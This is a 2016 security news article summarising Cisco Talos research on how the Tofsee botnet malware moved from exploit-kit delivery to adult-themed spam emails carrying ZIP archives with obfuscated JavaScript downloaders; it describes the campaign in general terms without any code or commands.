Switch in Malware Distribution

Monday, October 3, 2016 @ 03:10 PM gHale

An exploit kit stopped sending out malware so attackers are now using the malware’s botnet capabilities to deliver the payload, researchers said.

Tofsee, malware in existence since 2013, allows attackers to conduct activities, including click fraud, cryptocurrency mining, DDoS attacks and sending spam, said researchers at Cisco’s Talos team.

Linux DDoS Trojan Found
New Linux Trojan
Macro-based Malware Evolution
Macs Targeted with Backdoor

Up until June 2016, attackers sent out the malware using the RIG exploit kit and malvertising campaigns. Then, after the Angler exploit kit went away, attackers used RIG to deliver other payloads.

After RIG stopped delivering Tofsee, cybercriminals turned to email spam campaigns to infect computers. Usually, the Tofsee botnet sent spam emails, however, in August, researchers found the spam messages changed and started delivering Tofsee malware downloaders.

The volume of these spam emails increased since mid-August, reaching more than 2,000 messages on some days in September, Talos researchers said.

The spam emails are adult-themed and they purport to come from women in Russia and Ukraine. Recipients receive a set of instructions to download and open the ZIP archive attached to the messages as it supposedly contains pictures of the sender.

Instead of pictures, the archive contains an obfuscated JavaScript file that includes a WScript downloader designed to fetch and run an executable from a remote server controlled by the attacker. Once the file executes, the system becomes infected with Tofsee.